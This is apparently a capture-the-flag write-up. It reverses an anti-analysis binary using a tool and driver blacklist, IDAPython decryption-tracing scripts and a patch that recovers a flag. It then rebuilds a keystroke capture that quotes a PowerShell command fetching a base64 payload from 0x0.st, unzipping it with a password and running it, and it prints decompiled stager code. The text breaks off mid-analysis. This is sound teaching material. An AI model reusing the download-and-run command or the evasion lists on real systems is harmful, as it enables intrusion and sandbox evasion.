0x14002d2ef -> caeatengine\x46x\x3c\x3a\x45\x3a\x38.exe
0x14002d69f -> \x29aocess\x21acker.exe
0x14002da0f -> \x2castem\x22nformer.exe
0x14002dd8f -> lardpe.exe
0x14002e0bf -> ragmon.exe
0x14002e3ef -> haokexplorer.exe
0x14002e75f -> rass.exe
0x14002ea7f -> patools.exe
0x14002edbf -> iamunitydebugger.exe
0x14002fc8c -> \x2castem \x22nformer
0x14002ffff -> \x30ansider
0x14003031f -> \x2casinternals
0x14003065f -> \x26ark \x2bussinovich
0x1400309cf -> \x1caeat \x1engine
0x140030d0f -> \x29aocess \x21acker
0x14003105f -> \x1basmarck
0x14003137f -> \x30areshark
0x1400316af -> \x21ax\x46\x2bays \x2c\x1a
0x1400319ef -> \x2dae \x22nteractive \x1disassembler
0x140031ddf -> xa\x38dbg
0x1400320ef -> \x1faddler \x1everywhere
0x14003246f -> \x27ar \x2cofer
0x14003279f -> \x1fale\x1activity\x30atch
0x140032b0f -> \x2baclass.\x27\x1e\x2d
0x140032e4f -> \x24a\x38\x1c\x24\x37\x2b
0x140033cb3 -> \x2baclass
0x140033fa6 -> \x2baclass.\x27\x1e\x2d
0x14003431b -> \x2baclass
0x140034606 -> gat\x45\x2ccan\x1copy\x28n\x30rite\x26emory
0x140034a0e -> \x2castem\x22nformer
0x140034d36 -> \x2castem\x22nformer
0x1400350be -> \x1caeat \x1engine
0x1400353d6 -> caeatengine
0x14003574e -> \x1caeat \x1engine
0x140035a66 -> \x1caeat\x1engine
0x140035dde -> xa\x38dbg
0x1400360c6 -> xa\x38dbg\x45exe.pdb
0x14003644e -> xa\x38dbg
0x140036736 -> xa\x38dbg
0x140036a7e -> xa\x38dbg
0x140036d66 -> \x1dancan \x28gilvie
0x1400370ee -> \x2casinternals \x2dool
0x140037436 -> \x2casinternals
0x1400377ae -> \x29aocess \x26onitor
0x140037ae6 -> \x29aoc\x26on\x1driver.pdb
0x140037e8e -> \x2castem\x22nformer
0x1400381b6 -> \x29aocess\x21acker
0x14003853e -> \x2caylla
0x140038826 -> .a\x1a\x2f\x49\x48\x1c\x1dialog\x22mpl\x58\x2f\x29ick\x1dll\x20ui\x58\x58\x2f\x1c\x30indow\x58\x1a\x2d\x25\x58\x58\x58\x1a\x2d\x25\x58\x58
0x140038d4e -> \x26amory \x22ntrospection \x2dool
0x1400390f6 -> \x26a\x1c\x2b\x28\x2c\x28\x1f\x2d \x1d\x1e\x1b\x2e\x20\x20\x22\x27\x20 \x2c\x32\x26\x1b\x28\x25\x2c \x1a\x27\x1d \x1e\x31\x1e\x1c\x2e\x2d\x1a\x1b\x25\x1e\x2c
0x1400395be -> \x30areshark
0x1400398b6 -> ragister\x45tap\x45listener
0x140039c83 -> \x30areshark
0x140039f78 -> wareshark
0x14003ece3 -> darace.sys
0x14003efef -> \x29a\x28\x1c\x26\x28\x27\x36\x37.\x2c\x32\x2c
0x14003f2ff -> \x21aper\x29latform.sys
0x14003f62f -> \x1aaw\x2fmm.sys
0x14003f91f -> karocesshacker.sys
0x14003fc5f -> \x1ea\x28\x3a\x38.sys
0x14003ff4f -> \x1aa\x2c\x33\x22\x28\x3a\x38.sys
0x14004024f -> \x1ba\x45\x1flash\x3a\x38.sys
0x14004055f -> \x1ba\x45\x22\x36c\x3a\x38.sys
0x14004085f -> \x1ba\x26\x1e\x26x\x3a\x38.sys
0x140040b5f -> \x1ba\x26\x22\x31\x29\x3a\x38.sys
0x140040e5f -> \x1capcom.sys
0x14004114f -> cauz\x35\x38\x35.sys
0x14004144f -> \x30an\x2bing\x45\x34x\x3a\x38.sys
0x14004177f -> \x1fairplay\x24\x1d.sys
0x140041a8f -> paldqpoc.sys
0x140041d8f -> \x21a\x28s\x36\x1ec\x35\x34x\x3a\x38.sys
0x1400420bf -> \x29aymemx\x3a\x38.sys
0x1400423cf -> \x26anitor\x45win\x35\x34x\x3a\x38.sys
0x14004272f -> daiver.sys
0x140042a1f -> laa.sys
0x140042cff -> padsrvc\x45x\x3a\x38.pkms
0x14004302f -> kapocesshacker.sys
0x14004336f -> \x21ai\x27\x1f\x28\x3a\x38\x1a.\x2c\x32\x2c
0x14004367f -> magdrvamd\x3a\x38.sys
0x14004399f -> zam\x3a\x38.sys
0x140043c8f -> kaif.sys
0x140043f6f -> \x1aa\x2ep\x22\x28\x3a\x38.sys
0x14004426f -> \x1aar\x1drv\x35\x34.sys
0x14004456f -> \x1aar\x1drv\x35\x34\x35.sys
0x14004487f -> \x1aar\x1drv\x35\x34\x36.sys
0x140044b8f -> \x1aar\x1drv\x35\x34\x37.sys
0x140044e9f -> \x1ba\x26\x22x\x3a\x38.sys
0x14004519f -> \x1ba\x45\x1flash\x3a\x38.sys
0x1400454af -> \x1ba\x45\x21\x30\x26\x22\x28\x3a\x38\x45\x30\x35\x34.sys
0x1400457ef -> \x1ba\x45\x21\x30\x26\x22o\x3a\x38.sys
0x140045aff -> \x1ba\x45\x22\x36c\x3a\x38.sys
0x140045dff -> \x20a\x1c\x22\x1drv\x3a\x38.sys
0x14004610f -> \x21a\x28s\x36\x1ec\x35\x34x\x3a\x38.sys
0x14004643f -> \x21a\x28s\x36\x1ec\x3bx\x3a\x38.sys
0x14004675f -> \x27a\x22\x28\x25ib\x45\x31\x3a\x38.sys
0x140046a7f -> \x27a\x21\x20\x1b\x22\x28\x2c\x36x\x3a\x38.sys
0x140046daf -> \x29alash\x27\x2d.sys
0x1400470af -> \x29aymemx\x3a\x38.sys
0x1400473bf -> \x2ea\x28\x2b\x1e\x30\x3a\x38.\x2c\x32\x2c
0x1400476bf -> \x30an\x1flash\x3a\x38.sys
0x1400479cf -> \x30an\x2bing\x34x\x3a\x38.sys
0x140047cef -> dak\x3a\x38.sys
0x140047fdf -> mac\x1b\x2cv\x3a\x38.sys
0x1400482df -> naflash.sys
0x1400485df -> naflsh\x3a\x38.sys
0x1400488df -> paymem\x3a\x38.sys
0x140048bdf -> rakio\x3a\x38.sys
0x140048edf -> rakiow\x35\x34x\x3a\x38.sys
0x1400491ff -> rakiow\x3cx\x3a\x38.sys
0x14004950f -> sagwindrvx\x3a\x38.sys
0x14004983f -> saperbmc.sys
0x140049b3f -> samav\x3amsr.sys
0x140049e3f -> paddrv\x3a\x38.sys
0x14004a13f -> vaoxnetadp.sys
0x14004a44f -> vaoxusbmon.sys
0x14004a75f -> \x25alla\x26on.sys
0x14004aa4f -> \x29a\x2b\x2d\x26\x2c\x32\x2c.\x2c\x32\x2c
0x14004ad4f -> \x24abj\x1exp.sys
0x14004b03f -> \x29a\x2fiew\x1driver.sys
0x14004b35f -> \x29a\x28\x1c\x26\x28\x27\x36\x38.\x2c\x32\x2c
0x14004b65f -> \x2famouse.sys
0x14004b94f -> \x2faox\x26ouse.sys
0x14004bc4f -> \x2faox\x20uest.sys
0x14004bf4f -> \x2faox\x2c\x1f.sys
0x14004c23f -> \x2faox\x2fideo.sys
0x14004c53f -> vahgfs.sys
0x14004c82f -> vamemctl.sys
0x14004cb2f -> vamouse.sys
0x14004ce1f -> varawdsk.sys
0x14004d11f -> \x32a\x1ark\x1drv\x45d\x2cigned.sys
0x14004d46f -> \x32a\x1ark\x1drv.sys
0x14004d76f -> \x2caie\x2cvc.sys
0x14004da5f -> \x21atp\x1debugger\x2cdk.sys
0x14004dd9f -> dak\x3a\x38.sys
0x14004e07f -> dak\x37\x36.sys
0x14004e35f -> \x2caarp\x28\x1d\x45\x1drv.sys
0x14004f126 -> carss.exe
0x14004f45f -> sachost.exe
0x14004f79f -> laass.exe
0x14004facf -> waninit.exe
0x14004fe0f -> canhost.exe
0x14005014f -> \x2caandard\x1collector.\x2cervice.exe
0x14005054f -> \x28aerwolf\x21elper.exe
0x1400508cf -> \x28aerwolf\x21elper\x3a\x38.exe
0x140050c5f -> saeamwebhelper.exe
0x140050fdf -> \x27a\x1display.\x1container.exe
0x14005139f -> nacontainer.exe
0x1400516ff -> \x27a\x22\x1d\x22\x1a \x2chare.exe
[-] r8/r9 out of range at 0x140051a6f: r8=192, r9=0
0x140051daf -> wanlogon.exe
0x1400520ef -> \x29aesent\x26on\x45x\x3a\x38.exe
0x14005246f -> \x2castem\x2cettings\x1broker.exe
0x14005282f -> \x30ar\x1fault.exe
0x140052b6f -> davenv.exe
0x140052e9f -> \x2fa\x1debug\x1console.exe
0x14005321f -> \x28aen\x1console.exe
0x14005357f -> \x30andows\x2derminal.exe
0x1400ca976 -> \x2da\x2c\x2d\x2c\x22\x20\x27\x22\x27\x20
0x1400cad7e -> \x1da\x2c\x1a\x1b\x25\x1e\x45\x22\x27\x2d\x1e\x20\x2b\x22\x2d\x32\x45\x1c\x21\x1e\x1c\x24\x2c
[-] r8/r9 out of range at 0x1400cb1fe: r8=217, r9=0
[-] r8/r9 out of range at 0x1400cb53c: r8=141, r9=0
0x1400cb8fe -> \x1ba\x2e\x1d\x2b\x1a\x2d\x1e\x50
[-] r8/r9 out of range at 0x1400d2208: r8=198, r9=0
[-] r8/r9 out of range at 0x1400ef860: r8=232, r9=0
0x1400f217e -> \x25agal\x1copyright
0x1400f27ff -> \x40aar\x1file\x22nfo\x40\x2dranslation
0x1400f2cc1 -> \x40atring\x1file\x22nfo\x40
0x1400f3802 -> \x29aoduct\x27ame
0x1400f3e6f -> \x40aar\x1file\x22nfo\x40\x2dranslation
0x1400f4331 -> \x40atring\x1file\x22nfo\x40
0x1400f4e60 -> \x1fale\x1description
0x1400f54f3 -> \x40aar\x1file\x22nfo\x40\x2dranslation
0x1400f59b1 -> \x40atring\x1file\x22nfo\x40
0x1400f6ab8 -> baa\x80bb
0x1400fc827 -> aaocess
0x1400ff19f -> aa\x2f\x1e\x26\x1e\x2d\x21\x1e\x1f\x25\x1a\x20
0x1400ff6c3 -> aa\x28\x4a\x34xbadc\x34\x34d\x39\x4b
0x1400ff9d5 -> aa\x1a\x20 \x1d\x22\x2c\x29\x25\x1a\x32
0x14010350c -> \x41a, youll never recover the flag now.
[-] r8/r9 out of range at 0x14010456e: r8=241, r9=0
0x140104ad8 -> \x2ca\x1f\x2d\x30\x1a\x2b\x1e\x40\x26icrosoft\x40\x2bemoval\x2dools\x40\x26\x2b\x2d
0x140106a01 -> \x4aa\x53\x4b watchdog did not initialize. tampering likely.
0x140107459 -> waere control and identity align youll find the key to the \x41s.

From these strings we can see a huge blacklist that contains many analyze tools and virtual environments. In the main loop also has a line:

1
if ( RegOpenKeyExW(HKEY_LOCAL_MACHINE, (LPCWSTR)lpSubKey, 0, 0x20019u, (PHKEY)&Src.m256_f32[2]) )

This accessed the register of SOFTWARE\\Microsoft\\RemovalTools\\MRT.

Try detect ALL decrypt cipher function:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
# -*- coding: utf-8 -*-
import idc
import idautils
import ida_funcs
import ida_segment
import ida_name
import ida_kernwin

MIN_MOV_CHAIN = 2
MAX_BACK_INSNS = 220
FUNC_SIZE_MIN = 0xF0
FUNC_SIZE_MAX = 0x110

IGNORED_MNEMS = {
"vzeroupper",
"nop",
"int3",
"endbr64",
"endbr32",
}

def prev_insn(ea):
p = idc.prev_head(ea)
return p if p != idc.BADADDR else idc.BADADDR

def mnem(ea):
s = idc.print_insn_mnem(ea)
return s.lower() if s else ""

def op(ea, n):
s = idc.print_operand(ea, n)
return s.lower() if s else ""

def optype(ea, n):
return idc.get_operand_type(ea, n)

def prev_sig_insn(ea, max_skip=8):
p = prev_insn(ea)
skipped = 0
while p != idc.BADADDR and skipped < max_skip and mnem(p) in IGNORED_MNEMS:
p = prev_insn(p)
skipped += 1
return p

def is_mov_reg_imm(ea, regname):
if mnem(ea) != "mov":
return False
if op(ea, 0) != regname:
return False
return optype(ea, 1) == idc.o_imm

def is_lea_rcx_mem(ea):
if mnem(ea) != "lea":
return False
if op(ea, 0) != "rcx":
return False
t = optype(ea, 1)
return t in (idc.o_displ, idc.o_phrase, idc.o_mem)

def is_mov_stack_imm(ea):
if mnem(ea) != "mov":
return False
if optype(ea, 1) != idc.o_imm:
return False
dst = op(ea, 0)
if "[" not in dst or "]" not in dst:
return False
if "rsp" not in dst and "rbp" not in dst:
return False
return True

def count_contiguous_stack_mov_imm(start_ea):
cnt = 0
ea = start_ea
steps = 0
while ea != idc.BADADDR and steps < MAX_BACK_INSNS:
cur_m = mnem(ea)
if cur_m in IGNORED_MNEMS:
ea = prev_insn(ea)
steps += 1
continue

if is_mov_stack_imm(ea):
immv = idc.get_operand_value(ea, 1)
if 0 <= immv <= 0x1000:
cnt += 1
ea = prev_insn(ea)
steps += 1
continue
break
return cnt

def get_func_size_at(ea):
f = ida_funcs.get_func(ea)
if not f:
return -1, None
return (f.end_ea - f.start_ea), f

def is_candidate_call(call_ea):
if mnem(call_ea) != "call":
return False, None, False
if optype(call_ea, 0) not in (idc.o_near, idc.o_far):
return False, None, False

target = idc.get_operand_value(call_ea, 0)
if target in (idc.BADADDR, 0):
return False, None, False

fsz, f = get_func_size_at(target)
if f is None:
return False, None, False
if not (FUNC_SIZE_MIN <= fsz <= FUNC_SIZE_MAX):
return False, None, False
prev_raw = prev_insn(call_ea)
has_vzu = (prev_raw != idc.BADADDR and mnem(prev_raw) == "vzeroupper")
e1 = prev_sig_insn(call_ea)
e2 = prev_sig_insn(e1)
e3 = prev_sig_insn(e2)
e4 = prev_sig_insn(e3)

if idc.BADADDR in (e1, e2, e3, e4):
return False, None, False

order_ok = (
(is_mov_reg_imm(e1, "r9d") and is_mov_reg_imm(e2, "r8d")) or
(is_mov_reg_imm(e1, "r8d") and is_mov_reg_imm(e2, "r9d"))
)
if not order_ok:
return False, None, False
if not is_lea_rcx_mem(e3):
return False, None, False
if not is_mov_stack_imm(e4):
return False, None, False

chain = count_contiguous_stack_mov_imm(e4)
if chain < MIN_MOV_CHAIN:
return False, None, False

return True, target, has_vzu

def iter_exec_segs():
for s in idautils.Segments():
seg = ida_segment.getseg(s)
if not seg:
continue
if seg.perm & ida_segment.SEGPERM_EXEC:
yield seg.start_ea, seg.end_ea

def main():
candidates = {}

for start, end in iter_exec_segs():
ea = start
while ea != idc.BADADDR and ea < end:
ok, target, has_vzu = is_candidate_call(ea)
if ok:
if target not in candidates:
candidates[target] = {"calls": [], "has_vzu": False}
candidates[target]["calls"].append(ea)
candidates[target]["has_vzu"] = candidates[target]["has_vzu"] or has_vzu
ea = idc.next_head(ea, end)

targets = sorted(candidates.keys())
print(f"[+] matched targets: {len(targets)}")

renamed = []
for i, t in enumerate(targets):
new_name = f"decstr_{i:02d}"

ok = ida_name.set_name(t, new_name, ida_name.SN_NOWARN | ida_name.SN_NOCHECK)
if ok:
renamed.append((t, new_name, len(candidates[t]["calls"]), candidates[t]["has_vzu"]))

for cs in candidates[t]["calls"]:
old = idc.get_cmt(cs, 0) or ""
extra = " +vzu" if candidates[t]["has_vzu"] else ""
tag = f"[dec-candidate{extra} -> {new_name}]"
if tag not in old:
idc.set_cmt(cs, (old + " " + tag).strip(), 0)

for t, n, c, hv in renamed:
print(f" {n} @ 0x{t:X}, xrefs={c}, has_vzeroupper={hv}")

ida_kernwin.msg("[done] rename dec candidates finished.\n")

if __name__ == "__main__":
main()

Then trace all the strings:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
# -*- coding: utf-8 -*-
import os
import time
import struct
from collections import defaultdict

import idc
import idautils
import ida_dbg
import ida_funcs
import ida_kernwin

AUTO_CONTINUE = True
MAX_STR_READ = 0x400
MIN_PRINTABLE_LEN = 3
LOG_PATH = r"E:/CTF/temp/dec_trace.log"
g_dec_trace_hooks = None

def get_reg(name):
try:
return ida_dbg.get_reg_val(name)
except Exception:
return 0

def dbg_read_bytes(addr, sz):
if not addr or addr < 0x1000 or sz <= 0:
return None
try:
b = idc.read_dbg_memory(addr, sz)
if b:
if isinstance(b, str):
b = b.encode("latin-1", errors="ignore")
if len(b) >= sz:
return bytes(b[:sz])
except Exception:
pass
if hasattr(ida_dbg, "read_dbg_memory"):
try:
b = ida_dbg.read_dbg_memory(addr, sz)
if b:
if isinstance(b, str):
b = b.encode("latin-1", errors="ignore")
if len(b) >= sz:
return bytes(b[:sz])
except Exception:
pass
out = bytearray()
try:
for i in range(sz):
v = idc.read_dbg_byte(addr + i)
if v is None or v < 0 or v > 0xFF:
return None
out.append(v & 0xFF)
return bytes(out)
except Exception:
return None

def dbg_read_qword(addr):
if not addr or addr < 0x1000:
return None
try:
q = idc.read_dbg_qword(addr)
if isinstance(q, int) and 0 <= q <= 0xFFFFFFFFFFFFFFFF and q != idc.BADADDR:
return q
except Exception:
pass
b = dbg_read_bytes(addr, 8)
if not b or len(b) < 8:
return None
return struct.unpack("<Q", b)[0]

def is_printable_ascii_text(s):
if not s or len(s) < MIN_PRINTABLE_LEN:
return False
good = 0
for ch in s:
o = ord(ch)
if ch in "\r\n\t" or (32 <= o <= 126):
good += 1
return (good / max(1, len(s))) >= 0.80

def read_cstr_ascii(addr, maxlen=MAX_STR_READ):
b = dbg_read_bytes(addr, maxlen)
if not b:
return None
part = b.split(b"\x00", 1)[0]
if len(part) < MIN_PRINTABLE_LEN:
return None

for enc in ("utf-8", "latin-1"):
try:
s = part.decode(enc, errors="ignore")
if is_printable_ascii_text(s):
return s
except Exception:
pass
return None

def read_cstr_utf16le(addr, max_bytes=MAX_STR_READ):
if max_bytes % 2:
max_bytes += 1

b = dbg_read_bytes(addr, max_bytes)
if not b or len(b) < 4:
return None

end = None
for i in range(0, len(b) - 1, 2):
if b[i] == 0 and b[i + 1] == 0:
end = i
break
if end is None or end < 2:
return None

raw = b[:end]
try:
s = raw.decode("utf-16le", errors="ignore")
except Exception:
return None

if len(s) < MIN_PRINTABLE_LEN:
return None
good = 0
for ch in s:
o = ord(ch)
if ch in "\r\n\t" or (32 <= o <= 126) or (0x4E00 <= o <= 0x9FFF):
good += 1
if good / max(1, len(s)) >= 0.70:
return s
return None

def try_decode_text_at_ptr(p):
if not p:
return None
s = read_cstr_ascii(p)
if s:
return ("ascii", s)
s = read_cstr_utf16le(p)
if s:
return ("utf16", s)
return None

def extract_text_candidates(rax, rcx_entry):
cands = []

def add(label, ptr):
if not ptr:
return
dec = try_decode_text_at_ptr(ptr)
if dec:
enc, txt = dec
cands.append((label, ptr, enc, txt))

raw8_rax = dbg_read_bytes(rax, 8) if rax else None
q_rax = dbg_read_qword(rax) if rax else None
q_rcx = dbg_read_qword(rcx_entry) if rcx_entry else None

add("[RAX]", q_rax)
add("RAX", rax)
add("[RCX(entry)]", q_rcx)
add("RCX(entry)", rcx_entry)

if not cands:
return None, raw8_rax, q_rax

cands.sort(key=lambda x: len(x[3]), reverse=True)
return cands[0], raw8_rax, q_rax

def get_dec_funcs():
out = []
for ea, name in idautils.Names():
if name.startswith("decstr_"):
f = ida_funcs.get_func(ea)
if f and f.start_ea == ea:
out.append((ea, name, f))
out.sort(key=lambda x: x[0])
return out

def get_ret_eas(func):
rets = []
ea = func.start_ea
while ea != idc.BADADDR and ea < func.end_ea:
m = idc.print_insn_mnem(ea).lower()
if m.startswith("ret"):
rets.append(ea)
ea = idc.next_head(ea, func.end_ea)
return rets

def add_bpt(ea):
try:
ida_dbg.del_bpt(ea)
except Exception:
pass
ok = False
try:
ok = ida_dbg.add_bpt(ea)
ida_dbg.enable_bpt(ea, True)
except Exception:
ok = False
if not ok:
try:
idc.del_bpt(ea)
except Exception:
pass
try:
idc.add_bpt(ea)
idc.enable_bpt(ea, True)
except Exception:
pass

def del_bpt(ea):
try:
ida_dbg.del_bpt(ea)
except Exception:
pass
try:
idc.del_bpt(ea)
except Exception:
pass

def cleanup_old(decs):
global g_dec_trace_hooks
if g_dec_trace_hooks:
try:
g_dec_trace_hooks.unhook()
except Exception:
pass
try:
if hasattr(g_dec_trace_hooks, "fp") and g_dec_trace_hooks.fp:
g_dec_trace_hooks.fp.close()
except Exception:
pass
g_dec_trace_hooks = None
to_del = set()
for fea, _, f in decs:
to_del.add(fea)
for r in get_ret_eas(f):
to_del.add(r)

for ea in to_del:
del_bpt(ea)

ida_kernwin.msg(f"[cleanup] removed old hook and {len(to_del)} bpts\n")

class DecTraceHooks(ida_dbg.DBG_Hooks):
def __init__(self, entry_map, ret_map):
super().__init__()
self.entry_map = entry_map
self.ret_map = ret_map
self.ctx = defaultdict(list)

d = os.path.dirname(LOG_PATH)
if d:
os.makedirs(d, exist_ok=True)

self.fp = open(LOG_PATH, "w", encoding="utf-8", errors="ignore")
self.fp.write(f"# dec trace start: {time.ctime()}\n")
self.fp.flush()

def _log(self, line):
print(line)
try:
self.fp.write(line + "\n")
self.fp.flush()
except Exception:
pass

def dbg_bpt(self, tid, ea):
# entry
if ea in self.entry_map:
func_ea, name = self.entry_map[ea]
rcx = get_reg("RCX")
rsp = get_reg("RSP")
caller = dbg_read_qword(rsp) if rsp else 0

self.ctx[tid].append({
"func_ea": func_ea,
"name": name,
"rcx_entry": rcx,
"caller": caller or 0,
"t": time.time(),
})

self._log(
f"[ENTRY] tid={tid} {name}@0x{func_ea:X} "
f"caller=0x{(caller or 0):X} rcx=0x{(rcx or 0):X}"
)

if AUTO_CONTINUE:
ida_dbg.request_continue_process()
ida_dbg.run_requests()
return 0

# ret
if ea in self.ret_map:
func_ea, name = self.ret_map[ea]
rax = get_reg("RAX")

ctx_item = None
stk = self.ctx.get(tid, [])
for i in range(len(stk) - 1, -1, -1):
if stk[i]["func_ea"] == func_ea:
ctx_item = stk.pop(i)
break

rcx_entry = ctx_item["rcx_entry"] if ctx_item else 0
caller = ctx_item["caller"] if ctx_item else 0

hit, raw8, qrax = extract_text_candidates(rax, rcx_entry)
raw8_hex = raw8.hex() if raw8 else "None"

if hit:
label, ptr, enc, s = hit
self._log(
f"[RET ] tid={tid} {name}@0x{func_ea:X} ret_ea=0x{ea:X} "
f"caller=0x{(caller or 0):X} rax=0x{(rax or 0):X} "
f"raw8@rax={raw8_hex} [rax]=0x{(qrax or 0):X} "
f"src={label} ptr=0x{ptr:X} enc={enc} text={s!r}"
)
else:
self._log(
f"[RET ] tid={tid} {name}@0x{func_ea:X} ret_ea=0x{ea:X} "
f"caller=0x{(caller or 0):X} rax=0x{(rax or 0):X} "
f"raw8@rax={raw8_hex} [rax]=0x{(qrax or 0):X} text=<none>"
)

if AUTO_CONTINUE:
ida_dbg.request_continue_process()
ida_dbg.run_requests()
return 0

return 0

def dbg_process_exit(self, pid, tid, ea, code):
self._log(f"# process exit code={code}")
try:
self.fp.close()
except Exception:
pass
return 0

def install():
decs = get_dec_funcs()
if not decs:
ida_kernwin.msg("[-] no decstr_* funcs found. run rename script first.\n")
return None

cleanup_old(decs)

entry_map = {}
ret_map = {}

for fea, name, f in decs:
entry_map[fea] = (fea, name)
add_bpt(fea)

for r in get_ret_eas(f):
ret_map[r] = (fea, name)
add_bpt(r)

hk = DecTraceHooks(entry_map, ret_map)
hk.hook()

ida_kernwin.msg(f"[+] installed: {len(entry_map)} entries, {len(ret_map)} rets\n")
ida_kernwin.msg(f"[+] log -> {LOG_PATH}\n")
return hk

g_dec_trace_hooks = install()

Notice that in log:

1
[RET ] tid=7244 decstr_03@0x7FF737A5BDA0 ret_ea=0x7FF737A5BEA7 caller=0x7FF737A9F20C rax=0x32772FFBE0 raw8@rax=000085f8f8010000 [rax]=0x1F8F8850000 src=[RAX] ptr=0x1F8F8850000 enc=utf16 text='GIVEMETHEFLAG'

Find the function:

1
2
3
*(double *)&_XMM0 = decstr_03(&v249, v94, 32, 34, 47, 30, 38, 30, 45, 33, 30, 31, 37, 26, 32);
*(double *)&_XMM0 = decstr_27(&v250, n1361808966_2, 28, 38, 40, 74, 52, 23, 1, 0, 3, 2, 52, 52, 3, 57, 75);
*(double *)&_XMM0 = decstr_09(&Str, v160, 31, 37, 26, 32, 67, 29, 34, 44, 41, 37, 26, 50);

The decstr_03 is GIVEMETHEFLAG, as all bytes in big case add with 0x27.

Note that the decstr_27 add 0x27 is CMOq[>('*)[[*`r, with the header CMO, so patch the program, find anywhere and patch bytes to:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
.text:00007FF737A9F6C3                 mov     [rsp+170h+var_F0], 4Bh ; 'K'
.text:00007FF737A9F6CE mov [rsp+170h+var_F8], 39h ; '9'
.text:00007FF737A9F6D6 mov [rsp+170h+var_100], 3
.text:00007FF737A9F6DE mov [rsp+170h+var_108], 34h ; '4'
.text:00007FF737A9F6E6 mov [rsp+170h+var_110], 34h ; '4'
.text:00007FF737A9F6EE mov [rsp+170h+var_118], 2
.text:00007FF737A9F6F6 mov [rsp+170h+var_120], 3
.text:00007FF737A9F6FE mov [rsp+170h+var_128], 0
.text:00007FF737A9F706 mov [rsp+170h+var_130], 1
.text:00007FF737A9F70E mov [rsp+170h+var_138], 17h
.text:00007FF737A9F716 mov [rsp+170h+var_140], 34h ; '4'
.text:00007FF737A9F71E mov [rsp+170h+var_148], 4Ah ; 'J'
.text:00007FF737A9F726 mov dword ptr [rsp+170h+var_150], 28h ; '('
.text:00007FF737A9F72E lea rcx, [rbp+0F0h+var_A0]
.text:00007FF737A9F732 mov r8d, 1Ch
.text:00007FF737A9F738 mov r9d, 26h ; '&'
.text:00007FF737A9F73E call decstr_27 ; [dec-candidate -> decstr_027] [dec-candidate +vzu -> decstr_27]

And just run the program and watch the output.

CMO{0xbadc00d5}

What did you type

The two files are .pcap traffics, the big one is a keyboard data:

1
powersh <RET>ls<RET>cd<SPACE>Docu       <RET>ls<RET>c<DEL>[]IO.File::WwriteAall ""$pwd\sus.zip,<SPACE>[]Cconvert::FfromBase64Sst(irm<SPACE>''https://0x0.st/PbWE.txt)))<RET>ls<RET>unzip<RET>unzip<SPACE>-P<SPACE>1m_g0d_!!<SPACE>sus.z <SPACE>-d<SPACE>out<RET>mv<SPACE>out\*<SPACE>.<RET>./modu       <RET>rm<SPACE>*<RET>exit<RET>

This uploaded a zip’s Base64 to http://0x0.st/PbWE.txt, and the key of the zip is 1m_g0d_!!.

There’s an exe in the zip:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
int __fastcall main(int argc, const char **argv, const char **envp)
{
memset(Buffer, 0, sizeof(Buffer));
nSize[0] = 256;
memset(buf, 0, sizeof(buf));
memset(buf_, 0, 0x21u);
GetComputerNameA(Buffer, nSize);
n0x40 = -1;
do
++n0x40;
while ( Buffer[n0x40] );
SHA256(Buffer, n0x40, (__int64)buf);
GETSHA256FROMWEB(buf_);
for ( n32 = 0; n32 < 32; ++n32 )
{
if ( *((unsigned __int8 *)buf + n32) != *((unsigned __int8 *)buf_ + n32) )
exit(0);
}
LODWORD(p_count) = 0;
src = sub_140003A50((DWORD *)&p_count);
Size = (unsigned int)(p_count + 1);
if ( (_DWORD)p_count == -1 )
Size = -1;
buf_1 = malloc(Size);
memset(buf_1, 0, (unsigned int)p_count);
qmemcpy(buf_1, src, (unsigned int)p_count);
AES_KEYSCHEDULE((__int64)v13, (__int64)buf, &src_);
AES_256((__int64)v13, (char *)buf_1, (unsigned int)p_count);
if ( !buf_1 )
return -1;
n523 = sub_140003830(buf_1);
if ( n523 && n523 != 523 )
return 0;
memset(buf__1, 0, sizeof(buf__1));
buf__1[0] = buf_1;
buf__1[1] = (void *)(unsigned int)p_count;
LOBYTE(buf__1[2]) = 0;
sub_1400039E0(buf__1);
if ( buf__1[0] )
{
free_ww(buf__1[0]);
buf__1[0] = 0;
}
return 0;
}

And for the network traffic, the AES key is 66c9c5a2015ff2be075f3d430031f54d22f8ad7194363889a019350937946d74, as the SHA256 of THE-EMPEROR. And the sub_140003A50:

1
2
3
4
5
6
7
